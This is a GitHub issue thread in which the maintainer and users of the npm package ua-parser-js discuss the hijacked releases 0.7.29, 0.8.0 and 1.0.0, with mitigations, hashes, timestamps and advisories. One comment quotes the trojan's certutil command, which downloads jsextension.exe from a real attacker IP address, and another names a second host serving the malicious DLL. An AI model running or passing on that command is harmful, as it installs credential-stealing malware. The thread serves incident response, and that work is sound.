Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js

[SuperOleg39]

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or it is not safe?

Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?

[nypinstripes]

Ouch does that mean like there's malicious code in it or something?

@faisalman

[LyesIsogeo]

I just update package and windows defender block "ceprolad.a" a trojan. I don't have any internet access at the same moment... The trojan try to execute in the cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcacha -f download a .exe file.

[SuperOleg39]

Update - ^0.7.28 range is dangerous, 0.7.29 version already published.

We all need to fix 0.7.28 in our dependencies.

[SuperOleg39]

@faisalman i hope you can revert versions with vulnerabilities?

[KalleOlaviNiemitalo]

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

[alex-drocks]

Revert back to 0.7.28 all greater version are infected. My computer was infected this morning when i updated my docusaurus version. https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

[Tom910]

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version

[faisalman]

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don't realize something was up, luckily the effect is quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

[KalleOlaviNiemitalo]

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

[ohanedan]

I think we should publish new versions above that this hijected versions.

Like: 0.7.30 0.8.1 1.0.1

[SuperOleg39]

I think we should publish new versions above that this hijected versions.

Like: 0.7.30 0.8.1 1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

[benjilebon]

Extra carefulness required because it seems to be affecting linux machines as well, make sure the miner doesn't get installed in your servers & ci stuff

For now it seems to only hang in installing because the url containing the infection doesn't seem to be working, but it may not last

Linux users can use this command to see if the miner is running or not and stop it : ps -aux | grep jsextension

[ohanedan]

I think we should publish new versions above that this hijected versions. Like: 0.7.30 0.8.1 1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

That's right but it's a safest method I think. You can continue with version 2.0.0 and users don't specify a specific version will not be affected.

[faisalman]

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.

[aimozg]

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

[alex-drocks]

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

[faisalman]

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

You're right.. Ok then

[aimozg]

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

I've dropped the DLL it runs to a virustotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior It reads browser user data files and I've checked "files written" against my infected PC, it does look like a script to export OS credentials and a copy of cookies DB file from Chrome

[gaelhuot]

We fixed it using this in our package.json : "resolutions": { "**/ua-parser-js": "0.7.28" }

[faisalman]

I think we should publish new versions above that this hijected versions.

Like: 0.7.30 0.8.1 1.0.1

Done. Thanks for the suggestion 👍

[Cphusion]

a solution that we're using to address this vulnerability is to set the resolutions in pacakge.json to use the last good version:

...},"resolutions": { "ua-parser-js": "0.7.28" },...

That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.

[Tim-arts]

Please update the title of this issue to reflect more to the users with security issues

[rafipiccolo]

for information, this package is in use in at least 4 expo libs.

├─┬ @react-navigation/drawer@6.1.8
│ └─┬ react-native-reanimated@1.13.3
│   └─┬ fbjs@1.0.0
│     └── ua-parser-js@0.7.29 deduped
├─┬ expo-device@4.0.3
│ └── ua-parser-js@0.7.29
├─┬ expo-pixi@1.2.0
│ └─┬ fbemitter@2.1.1
│   └─┬ fbjs@0.8.17
│     └── ua-parser-js@0.7.29 deduped
└─┬ react-native-gesture-handler@1.10.3
  └─┬ fbjs@3.0.0
    └── ua-parser-js@0.7.29 deduped

[daveg717]

@faisalman Do you have 2FA enabled on your NPM acccount?

[alex-drocks]

for information, this package is in use in at least 4 expo libs.

├─┬ @react-navigation/drawer@6.1.8
│ └─┬ react-native-reanimated@1.13.3
│   └─┬ fbjs@1.0.0
│     └── ua-parser-js@0.7.29 deduped
├─┬ expo-device@4.0.3
│ └── ua-parser-js@0.7.29
├─┬ expo-pixi@1.2.0
│ └─┬ fbemitter@2.1.1
│   └─┬ fbjs@0.8.17
│     └── ua-parser-js@0.7.29 deduped
└─┬ react-native-gesture-handler@1.10.3
  └─┬ fbjs@3.0.0
    └── ua-parser-js@0.7.29 deduped

also in docusaurus

[faisalman]

https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices

[DanielJoyce]

@faisalman Do you have 2FA enabled on your NPM acccount?

Yes..if you're a OSS dev you need 2FA, preferably NOT SMS based.

Your account recovery email should also be set up with 2FA, and your password manager of choice as well. Again not SMS based.

[KalleOlaviNiemitalo]

@faisalman Thank you for your quick response to the attack.

[mensfeld]

// Update

Here's a summary of what I was able to figure out on this incident based on the code and previous incidents of similar nature both in npm and RubyGems:

https://www.whitesourcesoftware.com/resources/blog/popular-javascript-library-ua-parser-js-compromised-via-account-takeover/

This code contains two malicious components:

a) a cryptocurrency mining tool (ref: https://bit.ly/3Ca9lw1) b) trojan software (ref: https://bit.ly/3B6uXIk) but only for Windows stealing credentials from browers

Both are really serious but the biggest impact is (probably) on the Windows users. Let me look into the wallet and check the malicious files in more detail...

A bit of a good news is, that majority of Windows antivirus software was able to identify and stop the trojan component:

It is still worth pointing out, that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registries on Windows making them start again after a system restart.

// Edit

No option to check activities on this, since Monero does not allow as free blockchain exploration as others:

Sorry, its not possible to find txs associated with normal addresses in Monero 

[aimozg]

A bit of a good news is, that majority of Windows antivirus software was able to identify and stop the trojan component:

They do now, but in first hours only few antiviruses on virustotal detected it.

It is still worth pointing out, that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registries on Windows making them start again after a system restart.

In my case it registered itself into %appdata%/Microsoft/windows/start menu/programs/startup

[mensfeld]

@aimozg thank you for an update

They do now, but in first hours only few antiviruses on virustotal detected it.

As far as I know, the most popular once had the previous version signature (if they differ - that I will be able to check in the morning) available prior to the compromise. I used virus total now to just make sure that what I see is valid.

In my case it registered itself into %appdata%/Microsoft/windows/start menu/programs/startup

Yeah, that what I was referring. Same case with a few months timespan, so for anyone that is compromised: please check the registry changes and startup details.

[skryking]

Is there a time stamp for the initial change was made?

[mensfeld]

@skryking here you go:

[esryanoakley]

I know it's early, but can we have please a proper security incident disclosure here please? Including, but not limited to:

• Exact versions compromised
• date/time of published malicious code
• date/time of mitigation(s)
• IoC's
• Detailed write up of how this happened, and how we can be sure that it was limited in scope to this.
• Any other details available to help everyone identify and remove malicious servers ASAP before more damage is done.

[GradeyCullins]

We fixed it using this in our package.json : "resolutions": { "**/ua-parser-js": "0.7.28" }

Anyone know the solution for non-Yarn users? It is not clear to me if the "resolutions" field is Yarn-specific.

[alechemy]

We fixed it using this in our package.json : "resolutions": { "**/ua-parser-js": "0.7.28" }

Anyone know the solution for non-Yarn users? It is not clear to me if the "resolutions" field is Yarn-specific.

@GradeyCullins I believe the typical NPM-equivalent to resolve this sort of problem is to use this package: https://github.com/rogeriochaves/npm-force-resolutions

[mensfeld]

@esryanoakley I can give you part of this info though please note I do it based on my knowledge and data pulled out of our systems (I am not related to the authors in any way):

Exact versions compromised

• 0.7.29
• 0.8.0
• 1.0.0

Date/time of published malicious code

• 0.7.29 - Oct 22 21 14:15 CET
• 0.8.0 - Oct 22 21 14:16 CET
• 1.0.0 - Oct 22 21 14:16 CET

date/time of mitigation(s)

Oct 22 21 18:16 CET, Oct 22 21 18:23 CET and Oct 22 21 18:26 - those were the dates when the bumped versions were released shadowing previous once.

IoC's

There's a code reference above in my comment but again:

• https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29
• https://my.diffend.io/npm/ua-parser-js/0.8.1/1.0.0
• https://my.diffend.io/npm/ua-parser-js/0.7.30/0.8.0

Detailed write up of how this happened, and how we can be sure that it was limited in scope to this.

Account takeover and lack of 2FA. I am not the author or anyone involved so that's my understanding based on his descriptions.

Any other details available to help everyone identify and remove malicious servers ASAP before more damage is done.

For the past month me and other people in the company I work identified and reported over 350 packages with code including:

• crypto mining
• ENV stealing
• crypto jacking (wallets id replacement)
• botnets
• trojans

In general it's a open-source supply challenge that many are working to tackle. There are couple of things you can do and I did speak on that matter once or twice during some e-conferences.

[ohanedan]

A bit of a good news is, that majority of Windows antivirus software was able to identify and stop the trojan component:

In my case, Windows Defender blocked both of files(create.dll and jsextension.exe) at 17:07 TR time (UTC 14:07) and I think Defender blocked these before downloading. When I checked my firewall, I saw that no request was made to the download addresses.

[justinwilaby]

Hello -

I am trying to identify the SHA checksum for the compromised versions so I can check this against the package-lock entries and determine exposure in build pipelines and developer machines. Do you have this info? If so, can you please pass this along to me?

Thank you,

[rarkins]

@justinwilaby via npm:

That's aad8d679f15a721ed79454d553e3473f9f0536f1, cae20bf1c615939987f1ee9b65affc622f269c69 and 43b60a8a57666e8a63e1704d18230ab79dd3528f plus "sha512-EdEWUP3Dk9oyycRzMBbVHYW3GLbq5KPWHLKpXSNwD5F6u0s1x12mmP4KIzqSSzpngv8/8pE3f49/qGBG8VgqCg==, sha512-/S61pVR3mE1kANQHPd16yW529/O60WE3PZZ91igqTugOl7FRWYFKmtIPjPi4uXZEJlhlOFs0bqIbWZCM0hJlzA== and sha512-cksIU369ju8/AUCZR0uVkpXZpxj6IjGCglH/M3eCUz5F2Y8jyxfySU8O+RVKW6Tos3c/zKPky+iupeZetw6gWQ==

[justinwilaby]

@rarkins - Thank you for the info. Can you update the post to include the text for the integrity values? This will help in my search.

Thanks again

[KalleOlaviNiemitalo]

GitHub published a security advisory for ua-parser-js: https://github.com/advisories/GHSA-pjwm-rvh2-c87w

[raolakkakula]

Looks like NPM unpublished the compromised versions https://www.npmjs.com/package/ua-parser-js
Thanks for acting quickly and addressing this @faisalman faisalman

[esryanoakley]

@raolakkakula It's listed as deprecated but the malicious versions are still published on NPM: https://www.npmjs.com/package/ua-parser-js/v/0.8.0

[AnttiMK]

The hijacked versions have been removed from npm, pages for them return 404s:

[aguynamedben]

Great work dealing with this quickly, and npm for removing it within 5-6 hours. A few extra steps in pushing users to check their version and upgrade might make the world safer.

Suggestions:

• Pin this GitHub issue for a while (right-hand side of this page) so people coming to look for other ua-parser-js issues are exposed to this high-priority issue
• Put an alert at the top of https://github.com/faisalman/ua-parser-js

My coworker pointed this thread out to me in Slack, but if I had just Googled 'ua-parser-js' and visited the GitHub repo I wouldn't have noticed this important issue and known to check my version.

Also I'm not sure how this part of it works, but won't Dependabot will suggest people upgrade if there's a CVE? I don't see one in all the systems yet, i.e. https://snyk.io/vuln/npm:ua-parser-js

Thank you again 🙏 it was cool to see open source at work and for this to get fixed quickly.

[tjhorner]

What is an easy way to determine if a machine has been compromised by the malware included in these versions? I have many node projects on my machine, and since this package is so popular I wouldn't be surprised if one of my dependencies (or its dependencies, or its dependencies' dependencies...) depends on it.

I did a find for every ua-parser-js directory on my system and looked at each of the versions in their respective package.json, and luckily couldn't find any matching compromised versions. But it's still possible that my machine was infected in the past.

So, based on the IoC linked above, it seems macOS machines are not actually affected (though it's good to assume otherwise), on Linux it drops a jsextension binary, and on Windows drops a jsextension.exe binary. I suppose the best way to check for compromise is by looking for these binaries anywhere on disk. Correct me if I'm wrong.

[Safari77]

selectel.ru is still happy to serve the dll at 95.213.165.20 .

[naugtur]

Reading through one analysis of the malware, it spawns scripts from preinstall.

Everyone should run with pre/post install scripts off. It's not easy, but possible. Here's how https://dev.to/naugtur/get-safe-and-remain-productive-with-can-i-ignore-scripts-2ddc And a full talk about that: https://m.youtube.com/watch?v=Y5gtOqPjUJM

[maweil]

Does anybody still know when the malicious versions were released exactly? This would help to check whether anyone ran an npm install that fetched the malicious version during that time. Thanks for the help.